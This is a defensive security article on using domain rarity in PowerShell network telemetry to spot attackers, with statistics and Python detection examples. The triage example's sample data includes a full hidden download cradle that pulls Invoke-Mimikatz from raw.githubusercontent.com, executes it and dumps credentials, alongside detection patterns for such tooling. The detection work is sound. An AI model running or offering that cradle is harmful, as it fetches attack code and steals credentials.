Unusual network requests: how rare activities give away attackers

03.11.2025 7 minutes Author: Cyber Witcher

This article discusses how to recognize suspicious requests, why it is important to consider not only the main domain but also subdomains, and how cybersecurity teams can use this approach to improve the effectiveness of SOC monitoring. This is a practical guide for professionals who want to better understand behavioral signals of threats and strengthen the protection of corporate infrastructure.

Invisible Danger Signals in PowerShell Traffic

Based on a seven-month analysis of network connection telemetry (June 1 – December 31, 2024), covering over 3.2 million events and 742 unique base domains, an interesting pattern was found: domains that PowerShell rarely contacts are more likely to be associated with malicious activity. The odds of a rare domain being malicious were approximately 3.18 times higher than for frequently accessed domains (95% confidence interval: 0.39–25.9). Because the interval includes 1, the difference is not statistically significant on a sample with only ten malicious domains, but the direction of the effect is consistent enough to treat rarity as a signal worth feeding into threat monitoring.

Of particular note is the case where the common, highly used domain githubusercontent.com was identified as part of malicious activity through its subdomain raw.githubusercontent.com. This highlights the critical importance of analyzing not only the base domains but also subdomains—especially when it comes to cloud services, where the infrastructure is legitimate, but individual hosted resources can be used to distribute malicious code or organize command-and-control.

This approach helps to more accurately identify hidden risks and improve the effectiveness of threat response in complex corporate environments.

Research methodology

Hypothesis

Given a sufficiently high volume of telemetry, domain names that PowerShell rarely connects to are more likely to be malicious than domains that are frequently connected to, regardless of which PowerShell binary or implementation made the connection.

Data Collection

From June 1, 2024 to December 31, 2024, network connection telemetry related to PowerShell processes was collected. The dataset included the following processes: powershell.exe, powershell studio.exe, powershell_ise.exe, powershelltools.exe, powershelltoolsx64.exe, pwsh, and pwsh.exe, i.e. various versions and implementations of PowerShell. Connections to non-public top-level domains (e.g., internal/corporate TLDs) were excluded from the dataset to focus exclusively on external connections.

Data processing

Using the tldextract library, base domains were extracted (e.g., automox.com from api.automox.com), resulting in 742 unique base domains. Rarity was determined by the average number of contacts per full domain (FQDN): for each base domain, the total number of contacts was divided by the number of unique full domains under it, and if that average was 5 or less, the base domain was considered rare. By this criterion, 550 of the 742 base domains (74.1%) were classified as rare.
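As an added example (not the article's own code), the following Python pipeline reproduces the processing steps described above over a handful of constructed telemetry records: it keeps only the PowerShell-family process names, drops non-public TLDs, reduces each host name to its base domain, and applies the average-contacts-per-full-domain rarity criterion. The article used tldextract with the real Public Suffix List; here the tiny embedded suffix set, the internal TLD list and the sample events are all assumptions chosen so the example runs offline.

```python
"""Rare-domain heuristic for PowerShell network telemetry (constructed example)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# Process names the article lists as PowerShell implementations (lower-case for matching).
POWERSHELL_PROCESSES = {
    "powershell.exe", "powershell studio.exe", "powershell_ise.exe",
    "powershelltools.exe", "powershelltoolsx64.exe", "pwsh", "pwsh.exe",
}

# Assumption: a tiny stand-in for the Public Suffix List so the example runs offline.
# The article used tldextract, which carries the real list; use that in production.
PUBLIC_SUFFIXES = {"com", "net", "org", "io", "co.uk", "com.au"}

# Assumption: TLDs treated as non-public (internal/corporate) and therefore excluded.
NON_PUBLIC_TLDS = {"local", "internal", "corp", "lan", "home"}

RARE_THRESHOLD = 5.0  # average contacts per full domain at or below this => rare


def base_domain(fqdn: str) -> Optional[str]:
    """Registrable base domain of a host name, e.g. api.automox.com -> automox.com.

    Returns None for non-public TLDs or names without a recognised suffix, which
    mirrors the article's exclusion of internal/corporate TLDs from the dataset.
    """
    labels = fqdn.lower().strip(".").split(".")
    if len(labels) < 2 or labels[-1] in NON_PUBLIC_TLDS:
        return None
    # Longest matching suffix wins (co.uk before uk), as tldextract does with the PSL.
    for n in (2, 1):
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return None


@dataclass
class DomainStats:
    contacts: int = 0
    fqdns: set = field(default_factory=set)

    @property
    def avg_per_fqdn(self) -> float:
        return self.contacts / len(self.fqdns)

    @property
    def rare(self) -> bool:
        return self.avg_per_fqdn <= RARE_THRESHOLD


def aggregate(events: Iterable[Tuple[str, str]]) -> Dict[str, DomainStats]:
    """Roll (process_name, fqdn) events up to per-base-domain statistics."""
    stats: Dict[str, DomainStats] = defaultdict(DomainStats)
    for process, fqdn in events:
        if process.lower() not in POWERSHELL_PROCESSES:
            continue                      # keep only PowerShell-family processes
        base = base_domain(fqdn)
        if base is None:
            continue                      # internal TLD or unparseable name
        stats[base].contacts += 1
        stats[base].fqdns.add(fqdn.lower())
    return dict(stats)


def rare_domains(events: Iterable[Tuple[str, str]]) -> List[str]:
    """Base domains meeting the rarity criterion, sorted for stable output."""
    return sorted(b for b, s in aggregate(events).items() if s.rare)


# Constructed telemetry (process, destination host); not real data.
SAMPLE_EVENTS = (
    [("powershell.exe", "api.automox.com")] * 12
    + [("pwsh.exe", "raw.githubusercontent.com")] * 3
    + [("powershell.exe", "objects.githubusercontent.com")] * 9
    + [("powershell_ise.exe", "cdn.example.net")] * 2
    + [("powershell.exe", "dl.example.net")]
    + [("powershell.exe", "fileserver.corp.local")] * 40   # dropped: internal TLD
    + [("cmd.exe", "updates.example.net")] * 50             # dropped: not PowerShell
)

if __name__ == "__main__":
    for base, s in sorted(aggregate(SAMPLE_EVENTS).items()):
        print(f"{base:24} contacts={s.contacts:3} fqdns={len(s.fqdns)} "
              f"avg={s.avg_per_fqdn:5.2f} rare={s.rare}")
```

Note that githubusercontent.com comes out as not rare in the sample (12 contacts over 2 full domains, average 6.0), which is exactly the situation the article's case study addresses: the base-domain heuristic alone would not surface it, and subdomain-level review is needed.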

Threat intelligence and manual verification

Domain reputation was assessed using ReversingLabs data: a domain was marked as malicious if at least one third-party source flagged it as such. To reduce false positives (e.g., for well-known legitimate domains), 29 domains were manually verified and reclassified as safe, with the reasoning documented for each. For certain subdomains (for example, raw.githubusercontent.com within githubusercontent.com), the process arguments recorded in the logs were reviewed by hand: 5 of the 10 connections to that subdomain were judged malicious on the basis of the commands observed, such as downloading PowerSploit modules or executing Invoke-Mimikatz. This allowed real threats to be separated from legitimate use of the same platform.

Results and analysis

Domain contact distribution

The distribution of contacts was highly skewed:

  1. Percentiles: 60th percentile at 5.0 contacts, 90th at 82.0, 95th at 321.55, and 99th at 7,925.87

  2. Rare domains: 550 of 742 domains were classified as rare.

  3. The most active domains were “automox.com” (2,282,308 contacts), “launchdarkly.com” (493,812), and “amazonaws.com” (166,536).

  • Automox is a service for automated endpoint configuration and patch management.

  • LaunchDarkly is a software development platform for feature flag management and context-aware feature targeting.

  • Amazon Web Services (AWS) is the largest cloud services provider.

Figure 1. Cumulative frequency distribution of domain contacts.

Malicious domain statistics

  • Rare domains: 9 malicious out of 550 (1.64%, 95% CI: 0.86%–3.08%)

  • Common domains: 1 malicious out of 192 (0.52%, 95% CI: 0.09%–2.89%), namely “githubusercontent.com”

  • Odds ratio: 3.18 (95% CI: 0.39–25.9), indicating a trend towards higher risk in rare domains, although not statistically significant (chi-square p=0.4291, Fisher’s exact p=0.4668), most likely because of the small number of malicious domains (9 rare, 1 common)

Figure 2. Malware indicators by domain rarity.
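The statistics quoted above can be reproduced from the four cell counts alone. The following Python block is an added example, not the article's code: it builds the 2x2 table (rare/common by malicious/benign) from the published counts and computes the odds ratio, a Wald confidence interval, the two-sided Fisher's exact p-value and the chi-square p-value using only the standard library. The odds ratio and both p-values match the article; the chi-square value is reproduced only with Yates' continuity correction, so that is what the block applies. The Wald interval comes out at roughly 0.40–25.2 rather than the quoted 0.39–25.9, so the article evidently used a slightly different interval method, which it does not name.

```python
"""Association statistics for a rare/common x malicious/benign table (standard library only)."""
import math
from fractions import Fraction

# Cell counts taken from the article: 9 of 550 rare and 1 of 192 common domains were malicious.
RARE_MALICIOUS, RARE_BENIGN = 9, 550 - 9
COMMON_MALICIOUS, COMMON_BENIGN = 1, 192 - 1


def odds_ratio(a: int, b: int, c: int, d: int) -> float:
    """OR for the table [[a, b], [c, d]] = (a/b) / (c/d)."""
    return (a * d) / (b * c)


def odds_ratio_ci(a, b, c, d, z=1.96):
    """Wald confidence interval on the log-odds scale (95% for z = 1.96)."""
    se = math.sqrt(1 / a + 1 / b + 1 / c + 1 / d)
    log_or = math.log(odds_ratio(a, b, c, d))
    return math.exp(log_or - z * se), math.exp(log_or + z * se)


def fisher_exact_two_sided(a, b, c, d) -> float:
    """Two-sided Fisher's exact p-value: total probability of all tables with the same
    margins whose hypergeometric probability does not exceed the observed table's.
    Exact rational arithmetic avoids the rounding tolerance most libraries need."""
    n = a + b + c + d
    row1, col1 = a + b, a + c              # rare domains, malicious domains
    denom = math.comb(n, row1)

    def prob(k: int) -> Fraction:           # P(k malicious among the row1 rare domains)
        return Fraction(math.comb(col1, k) * math.comb(n - col1, row1 - k), denom)

    p_obs = prob(a)
    lo, hi = max(0, row1 + col1 - n), min(row1, col1)
    return float(sum(p for p in (prob(k) for k in range(lo, hi + 1)) if p <= p_obs))


def chi_square_yates(a, b, c, d):
    """Chi-square statistic with Yates' continuity correction (1 df) and its p-value."""
    n = a + b + c + d
    stat = n * (abs(a * d - b * c) - n / 2) ** 2 / ((a + b) * (c + d) * (a + c) * (b + d))
    p = math.erfc(math.sqrt(stat / 2))      # upper tail of the chi-square distribution, 1 df
    return stat, p


def summarize(a=RARE_MALICIOUS, b=RARE_BENIGN, c=COMMON_MALICIOUS, d=COMMON_BENIGN) -> dict:
    """All figures a report would quote for one 2x2 table."""
    lo, hi = odds_ratio_ci(a, b, c, d)
    stat, p_chi = chi_square_yates(a, b, c, d)
    return {
        "rare_rate": a / (a + b), "common_rate": c / (c + d),
        "odds_ratio": odds_ratio(a, b, c, d), "ci95": (lo, hi),
        "fisher_p": fisher_exact_two_sided(a, b, c, d),
        "chi2_yates": stat, "chi2_p": p_chi,
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key:12} {value}")
```

With a single malicious domain in the common group, one reclassification in either direction moves the odds ratio by a factor of two or more, which is why the confidence interval is so wide and why the article's manual verification step matters as much as the statistic itself.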

Case study: githubusercontent.com

The domain “githubusercontent.com” (38 contacts across 2 full domains, “raw.githubusercontent.com” and “objects.githubusercontent.com”, an average of 19.00 contacts per full domain) was flagged as malicious because of 5 manually identified malicious contacts with “raw.githubusercontent.com”. These contacts carried PowerShell commands that downloaded and executed offensive tooling, such as PowerSploit modules and Invoke-Mimikatz.

Another subdomain, “objects.githubusercontent.com” (28 contacts), did not show any malicious activity. This finding illustrates that even commonly used domains can contain malicious subdomains, highlighting the need for subdomain-level analysis to detect threats.
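The manual review of process arguments described in the case study can be partly automated. The Python block below is an added example, not the article's tooling: it triages PowerShell command lines against a few indicators the article names (a download from raw.githubusercontent.com, a download cradle fed to Invoke-Expression, PowerSploit or Invoke-Mimikatz by name) and first decodes any -EncodedCommand payload, which PowerShell expects as base64 of UTF-16LE text, so that encoding does not hide the indicators. The command lines, repository paths and indicator lists are constructed assumptions; the objects.githubusercontent.com sample is included to show the subdomain-level distinction the article draws.

```python
"""Triage of PowerShell command lines by their arguments (constructed samples)."""
import base64
import re

# Indicator patterns. The names come from the article's case study; the list is an
# assumption for illustration, not a complete detection rule set.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|"
    r"Start-BitsTransfer", re.I)
INVOKE_EXPRESSION = re.compile(r"Invoke-Expression|\biex\b", re.I)
KNOWN_TOOLING = re.compile(r"PowerSploit|Invoke-Mimikatz|Invoke-Shellcode", re.I)
RAW_GITHUB = re.compile(r"https?://raw\.githubusercontent\.com/", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Value PowerShell expects after -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Classify one command line as 'malicious', 'review' or 'benign', with reasons."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"   # match on both
    high, medium = [], []

    tools = sorted(set(KNOWN_TOOLING.findall(text)), key=str.lower)
    if tools:
        high.append("known offensive tooling: " + ", ".join(tools))
    if DOWNLOAD_CRADLE.search(text) and INVOKE_EXPRESSION.search(text):
        high.append("download cradle fed to Invoke-Expression")
    if RAW_GITHUB.search(text) and DOWNLOAD_CRADLE.search(text):
        medium.append("download from raw.githubusercontent.com")   # needs analyst review
    if decoded is not None:
        medium.append("encoded command decoded")

    verdict = "malicious" if high else ("review" if medium else "benign")
    return {"verdict": verdict, "reasons": high + medium, "decoded": decoded}


# Constructed command lines (not from the article's telemetry).
SAMPLE_COMMAND_LINES = [
    # 1: classic cradle pulling Invoke-Mimikatz from PowerSploit and running it
    "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/"
    "Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"",
    # 2: encoded command that only downloads a profile script from raw.githubusercontent.com
    "powershell.exe -NoProfile -enc " + encode_command(
        "iwr https://raw.githubusercontent.com/example-user/dotfiles/main/profile.ps1"
        " -OutFile $PROFILE"),
    # 3: release asset download from objects.githubusercontent.com, nothing executed
    "pwsh.exe -c \"Invoke-WebRequest https://objects.githubusercontent.com/release/tool-1.2.zip"
    " -OutFile C:\\Temp\\tool.zip\"",
    # 4: ordinary local script run; -ExecutionPolicy must not be mistaken for -e
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\deploy.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = triage(line)
        print(result["verdict"], "|", "; ".join(result["reasons"]) or "no indicators")
```

The second sample lands in the review bucket rather than being called malicious: a download from raw.githubusercontent.com is exactly the kind of contact the article found split between benign and malicious use (5 of 10), so the script surfaces it for an analyst instead of deciding on its own.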

Comparison with other processes

Another research question was to compare the domains accessed by other similar processes with those recorded during PowerShell execution.

The following processes were selected for this analysis:

  • ‘rundll32.exe’

  • Python (including macOS and Windows versions)

  • ‘cmd.exe’

  • ‘cscript.exe’

  • ‘wscript.exe’

  • ‘bash’

  • ‘zsh’

These are mainly other command-line shells or script interpreters, plus “rundll32.exe”, which loads and executes functions exported by dynamic link libraries (DLLs) from the command line.

When the same heuristics used for PowerShell were applied to the domains these processes contacted, the results differed somewhat. The 156,203 connection records for “rundll32.exe” covered 940 unique domains, of which 722 were “rare” by the same criterion (an average of at most five contacts per full domain). Only one contacted domain was found to be malicious across the rare and non-rare groups combined.

Similarly, the 795,346 connection records for Python covered 825 unique domains, of which 616 were rare. None of the rare domains was malicious, while 1 of the non-rare domains was. The remaining interpreters (cscript, cmd, bash and zsh) showed similar results: each had zero or one malicious domain. wscript, however, was much more interesting. Its overall usage in the dataset was far lower, with only 6,936 connection events and 82 unique domains; of these, 58 (about 71%) were rare and 5 were classified as malicious.

Recommendations

  • Prioritize rare domains: Security teams should focus investigation effort on rare domains. The higher rate of malicious domains among them was not statistically significant in this sample, but the trend held for both PowerShell and wscript among the processes examined.

  • Subdomain analysis: For frequently contacted domains, analyze subdomains and process arguments to detect malicious activity, as shown by “githubusercontent.com”.

  • Integrate manual inspection: Combine automated threat intelligence with manual inspection to reduce false positives and detect nuanced threats, especially in domains with high contact volume.

  • Investigate anomalous usage of “wscript.exe”: Some environments still use wscript extensively. In this dataset, where it was used rarely, it had the highest proportion of malicious domains among the processes examined (5 of 82 unique domains), so isolated wscript network activity deserves scrutiny.

Future work

Further development of this topic opens several research directions. One is the analysis of temporal patterns, to find out whether particular periods of activity are associated with suspicious domain connections: for example, whether interactions with malicious resources spike on weekends or outside standard working hours. Time series analysis is suited to this, as it can expose hidden trends and recurring patterns.

Another promising direction is the study of process behavior, in particular command-line arguments, to find recurring signs of malicious actions, such as remote loading of PowerShell scripts or data exfiltration. Such an approach would allow risk to be assessed more accurately, refine the rare-versus-common distinction, and surface behavioral indicators of threats.

In the future, an integrated risk scoring system could combine access frequency, abuse history, domain category, and external threat intelligence. This would allow suspicious resources to be prioritized at scale and potential attacks to be handled faster, turning analytical findings into practical security tooling.

Conclusion

The results show that even single, seemingly insignificant events in PowerShell traffic can be early indicators of a threat. Rare domain accesses, and activity involving individual subdomains of popular platforms, remain among the most valuable signals for detecting hidden activity. This is especially true where PowerShell or wscript are used sporadically and outside their typical context: such cases often lead to the discovery of malicious component downloads, commands that bypass security controls, and subsequent escalation.
